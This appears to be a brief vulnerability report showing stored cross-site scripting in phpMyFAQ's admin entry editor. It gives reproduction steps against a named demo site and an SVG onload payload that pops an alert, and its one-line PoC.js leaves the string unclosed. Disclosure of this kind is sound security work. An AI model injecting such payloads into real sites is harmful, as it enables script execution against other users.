Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.
1-log in as an admin user first.
2-go to : https://roy.demo.phpmyfaq.de/admin/?action=editentry
3- add this payload in the description: "><svg/onload=alert(11);>
3- save it as a published post
4- open the main page https://roy.demo.phpmyfaq.de/ and the XSS will work.
// PoC.js
var payload = "><svg/onload=alert(11);>